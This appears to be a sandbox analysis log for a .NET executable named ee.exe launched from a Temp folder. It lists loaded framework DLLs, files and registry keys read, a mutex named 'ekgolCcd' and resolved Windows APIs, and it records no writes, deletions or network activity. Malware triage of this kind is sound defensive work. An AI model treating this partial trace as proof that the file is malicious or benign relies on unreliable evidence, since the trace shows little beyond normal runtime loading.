C:\Windows\Microsoft.Net\assembly\GAC_32\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Serialization.Formatters.Soap\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Serialization.Formatters.Soap.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\uxtheme.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Windows\assembly\GAC_64 C:\Windows\assembly\GAC_64\mscorlib.resources C:\Windows\assembly\GAC_32 C:\Windows\assembly\GAC_32\mscorlib.resources C:\Windows\assembly\GAC_MSIL C:\Windows\assembly\GAC_MSIL\mscorlib.resources C:\Windows\assembly\GAC_MSIL\mscorlib.resources\* C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\assembly\GAC C:\Windows\assembly\GAC\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_64 C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_32 C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_MSIL C:\Windows\Microsoft.Net\assembly\GAC_MSIL\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\* C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll C:\Windows\SysWOW64\ntdll.dll
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\ee.exe.config C:\Users\Seven01\AppData\Local\Temp\ee.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\assembly\pubpol28.dat C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll C:\Windows\SysWOW64\ntdll.dll
Write Files
Nothing to display
Delete Files
Nothing to display
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ee.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgJITDebugLaunchSetting HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\CMF\Config HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CMF\Config\SYSTEM HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409 HKEY_CURRENT_USER\Software\Classes HKEY_CURRENT_USER\Software\Classes\AppID\ee.exe HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\9A54A26C HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgJITDebugLaunchSetting HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CMF\Config\SYSTEM HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\9A54A26C HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
Write Keys
Nothing to display
Delete Keys
Nothing to display
Mutexes
ekgolCcd
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW clr.dll.SetRuntimeInfo clr.dll._CorExeMain mscoree.dll.CreateConfigStream mscoreei.dll.CreateConfigStream kernel32.dll.GetNumaHighestNodeNumber kernel32.dll.GetSystemWindowsDirectoryW advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddSIDToBoundaryDescriptor kernel32.dll.CreateBoundaryDescriptorW kernel32.dll.CreatePrivateNamespaceW kernel32.dll.OpenPrivateNamespaceW kernel32.dll.DeleteBoundaryDescriptor kernel32.dll.WerRegisterRuntimeExceptionModule kernel32.dll.RaiseException mscoree.dll.#24 mscoreei.dll.#24 ntdll.dll.NtSetSystemInformation kernel32.dll.SortGetHandle kernel32.dll.SortCloseHandle kernel32.dll.GetNativeSystemInfo ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware ole32.dll.CoGetContextToken clrjit.dll.sxsJitStartup clrjit.dll.getJit kernel32.dll.GetFullPathNameW 